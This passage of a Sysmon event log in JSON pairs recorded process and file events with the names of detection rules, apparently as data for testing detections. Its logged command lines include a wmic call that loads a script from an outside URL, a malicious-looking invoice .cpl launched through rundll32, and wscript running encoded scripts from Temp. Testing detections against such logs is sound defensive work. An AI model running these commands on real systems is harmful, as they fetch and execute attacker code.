12:17:14.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10675,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T12:17:14.893930Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-29 21:09:48.910","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-6056-5D3F-0000-0010C9EF4100","ProcessId":4600,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl","UtcTime":"2019-07-29 21:11:11.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4860,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:11.156704Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\System32\\control.exe\" \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\control.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A7B65500","ParentProcessId":4996,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ProcessId":4356,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.445"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:17.587732Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ParentProcessId":4356,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ProcessId":4884,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4864,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:17.621241Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\wscript.exe\" /e:JScript.Encode /nologo C:\\Users\\IEUser\\AppData\\Local\\Temp\\info.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE","Image":"C:\\Windows\\SysWOW64\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ParentProcessId":4884,"ProcessGuid":"747F3D96-60F7-5D3F-0000-00106F2F5600","ProcessId":6160,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:19.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4865,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:19.098105Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic process list /format:\"https://a.uguu.se/x50IGVBRfr55_test.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-CE84-5CE6-0000-001094130600","ParentProcessId":2940,"ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 16:49:05.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":892,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T16:49:05.736570Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-23 16:49:07.731","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\x50IGVBRfr55_test[1].xsl","UtcTime":"2019-05-23 16:49:07.731"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":894,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-23T16:49:07.731893Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WScript or CScript Dropper","Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\updatevbs.vbs\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.8.7600.16385","Hashes":"SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\updatevbs.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9C8E-5D04-0000-0010D0421600","ParentProcessId":540,"ProcessGuid":"365ABB72-9C9D-5D04-0000-001039CE1600","ProcessId":172,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 07:22:05.660"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7681,"Execution_attributes":{"ProcessID":2044,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-15T07:22:05.691759Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.236","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\~DF0187A90594A6AC9B.TMP","UtcTime":"2021-01-26 13:21:13.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429127,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.237481Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.558","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\b8162606fcd2bea192a83c85aaff3292f908cfde","UtcTime":"2021-01-26 13:21:13.558"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429128,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.558988Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 13:21:13.560"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429129,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.560814Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 13:21:13.561"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429130,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.561514Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.290","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.log","UtcTime":"2021-01-26 13:21:13.683"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429131,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.683762Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\bouss\\source\\repos\\blabla\\","Description":"MSBuild.exe","FileVersion":"16.6.0.22303","Hashes":"SHA1=20456AC066815ED10C6CEF51AF5431ED6001532F,MD5=35DC099BE64FA5AB4C01DDA908745240,SHA256=5083FD9C0AB7ECAEE85B04A22EBD29A88D7BC75CB02186D9C9736269B8AC10A9,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-5082-600D-0000-0020A246F726","LogonId":"0x26f746a2","OriginalFileName":"MSBuild.exe","ParentCommandLine":"\"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe\" \"C:\\Users\\bouss\\source\\repos\\blabla\\blabla.sln\"","ParentImage":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ParentProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ParentProcessId":7664,"ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"Product":"Microsoft® Build Tools®","RuleName":"","TerminalSessionId":5,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2021-01-26 13:21:13.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2429132,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.690036Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.641","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\blabla.lastbuildstate","UtcTime":"2021-01-26 13:21:13.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429134,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.972503Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429135,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.975523Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429136,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.975732Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 13:21:14.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429140,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.399477Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.394"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429141,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425366Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 